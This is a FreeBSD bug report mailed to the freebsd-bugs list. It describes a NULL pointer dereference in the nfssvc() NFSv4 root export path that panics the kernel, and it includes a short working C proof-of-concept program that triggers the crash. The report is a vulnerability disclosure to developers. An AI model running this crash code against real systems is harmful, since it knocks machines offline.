[Bug 217508] admins calling nfssvc() can cause a NULL dereference and a panic while exporting a filesystem

bugzilla-noreply at freebsd.org bugzilla-noreply at freebsd.org
Thu Mar 2 23:10:51 UTC 2017 

https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=217508

            Bug ID: 217508
           Summary: admins calling nfssvc() can cause a NULL dereference
                    and a panic while exporting a filesystem
           Product: Base System
           Version: 10.3-RELEASE
          Hardware: Any
                OS: Any
            Status: New
          Severity: Affects Some People
          Priority: ---
         Component: kern
          Assignee: freebsd-bugs at FreeBSD.org
          Reporter: tim.newsham at nccgroup.trust

/*
 * expcrash.c
 *     Crash FreeBSD with an NFS export request.

Description:
When making a mount request with the nfssvc system call, the
mount point may not be fully initialized, resulting in a NULL
pointer and a crash.  This can occur, for example, when making
a NFSSVC_V4ROOTEXPORT call with the MNT_EXPORTED and MNT_EXPUBLIC
flags.  This dispatches to sys_nfsvc which calls nfssvc_nfsd to
nfssvc_srvcall and to nfsrv_v4rootexport with the export arguments 
provided by the caller.  This calls to nfsrv_v4rootexport which
uses the nfsv4root_mnt mount while calling to vfs_export and 
vfs_setpublicfs.  This mount record is not fully populated and
when vfs_setpublicfs uses the VFS_ROOT macro which uses the
VFS_PROLOGUE macro with the mount record, it deferences
mp->mnt_vfc->vfc_flags.  however, mnt_vfc has not yet been initialized
and results in a NULL pointer dereference and a panic.
 */

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>

#include <sys/param.h>
#include <sys/mount.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <fs/nfs/nfskpiport.h>
#include <fs/nfs/nfsproto.h>
#include <fs/nfs/nfsport.h>
#include <fs/nfs/nfs.h>
#include <nfs/nfssvc.h>
#include <unistd.h>

int main(int argc, char **argv)
{
    struct nfsex_args args;
    int x;

    memset(&args, 0, sizeof args);
    args.export.ex_flags = MNT_EXPORTED | MNT_EXPUBLIC;
    x = nfssvc(NFSSVC_V4ROOTEXPORT, &args);
    printf("nfssvc %d\n", x);
    return 0;
}

-- 
You are receiving this mail because:
You are the assignee for the bug.

More information about the freebsd-bugs mailing list